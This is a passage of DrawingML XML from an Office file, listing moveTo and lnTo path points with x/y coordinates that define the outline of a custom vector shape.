                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750" y="4310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="4232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="4232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4174"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3223" y="3979"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3223" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3128" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3040" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3040" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018" y="3990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971" y="3990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2940" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2861" y="4042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2793" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2724" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2640" y="4116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2609" y="4116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614" y="4079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="4038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="3964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3040" y="3854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160" y="3785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160" y="3785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3191" y="3880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3223" y="3979"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4220" y="4856"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4184" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4068" y="5197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3953" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3953" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3942" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3926" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3926" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="5192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3963" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3963" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989" y="5077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4011" y="5066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4032" y="5056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4047" y="5040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4063" y="5019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4079" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4158" y="4909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4189" y="4883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4189" y="4877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4158" y="4898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4121" y="4919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073" y="4877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4063" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4047" y="4835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4032" y="4814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4011" y="4804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3984" y="4788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="4704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3932" y="4620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="4541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3890" y="4457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864" y="4379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="4300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3795" y="4221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3758" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3969" y="4205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4052" y="4252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4047" y="4237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="4174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3748" y="4021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="4006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3706" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3690" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3680" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3680" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3611" y="3885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528" y="3727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3517" y="3707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496" y="3696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3459" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423" y="3591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423" y="3591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3464" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496" y="3507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3522" y="3460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3543" y="3418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3559" y="3370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3564" y="3323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3564" y="3281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3559" y="3276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3559" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3548" y="3360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3507" y="3439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3481" y="3480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3444" y="3523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3401" y="3565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3401" y="3565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381" y="3554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3354" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3354" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270" y="3497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3213" y="3444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150" y="3391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3081" y="3344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018" y="3302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2950" y="3260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="3223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2808" y="3192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2808" y="3192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2761" y="3150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="3119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2672" y="3097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2703" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="3176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="3176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656" y="3134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2609" y="3124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="3155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2761" y="3192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2856" y="3244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2856" y="3244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2966" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3076" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3181" y="3497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123" y="3597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3050" y="3480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3013" y="3423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971" y="3370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="3323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2950" y="3370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018" y="3480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144" y="3738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144" y="3738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3023" y="3801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2897" y="3859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2761" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="3958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="3958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2603" y="3932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2582" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2551" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="3895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="3895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="3801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420" y="3707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="3607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388" y="3512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388" y="3413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2393" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415" y="3223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2425" y="3176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="3223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2393" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2378" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2362" y="3418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2357" y="3517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="3617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2383" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="3822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2430" y="3938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415" y="3958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404" y="4021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404" y="4021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2283" y="4053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1942" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1848" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1690" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1658" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1658" y="4064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1695" y="4079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1769" y="4105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1858" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2063" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2435" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2462" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2556" y="4148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2556" y="4148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2551" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="4185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="4185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="4247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2362" y="4315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2283" y="4389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2210" y="4473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141" y="4562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2078" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2026" y="4751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1989" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1989" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931" y="4872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911" y="4888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1890" y="4903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1890" y="4903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1769" y="4809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711" y="4762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1658" y="4715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1606" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1559" y="4609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1517" y="4552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1511" y="4568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1548" y="4630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1590" y="4693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1685" y="4814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737" y="4872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1795" y="4924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1858" y="5040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1874" y="5077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1900" y="5103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931" y="5124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931" y="5124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="5218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="5313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1937" y="5407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968" y="5229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984" y="5140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1995" y="5140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1995" y="5140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="5134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2068" y="5119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2068" y="5119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141" y="5161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2215" y="5197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="5261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="5261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2383" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2430" y="5350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2509" y="5350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2530" y="5339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="5329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="5329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656" y="5360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2887" y="5413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997" y="5434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997" y="5434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2960" y="5486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2913" y="5539"/>
                  </a:lnTo>
                  <a:lnTo>
